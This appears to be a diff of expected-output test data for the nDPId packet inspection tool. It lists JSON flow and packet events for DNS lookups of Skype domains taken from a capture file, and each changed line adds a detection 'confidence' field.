-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431969641948,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969641948,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5KYAAEAREpPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431969642087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431969642087,"pkt":"0NQSxnP1PBXCt3IOCABFAABDTB0AAEARqxnAqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1431969642087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431969642087,"pkt":"0NQSxnP1PBXCt3IOCABFAABDfx0AAEAReBnAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1431969642244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969642244,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7CqYAAEAR7JjAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1431969642247,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969642247,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7ECYAAEAR5xjAqAEiwKgBAf+SADUAJwCOlegBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1431969642318,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431969642318,"pkt":"0NQSxnP1PBXCt3IOCABFAABE3usAAEARGErAqAEiwKgBAfpVADUAMOQoL9MBAAABAAAAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431969642334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1431969642334,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAnAAAEAR9LLAqAEiwKgBAeU5ADUAQzJbSPEBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+t\/gAAEARP0PAqAEiwKgBAcKBADUAKu5ghe0BAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+EyEAAEAR5BrAqAEiwKgBAf4VADUAKsDYd8YBAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAABwAAQ=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431969642376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1431969642376,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+lUAQEJvL9OBgAABAAEAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAQABBffSSI="}
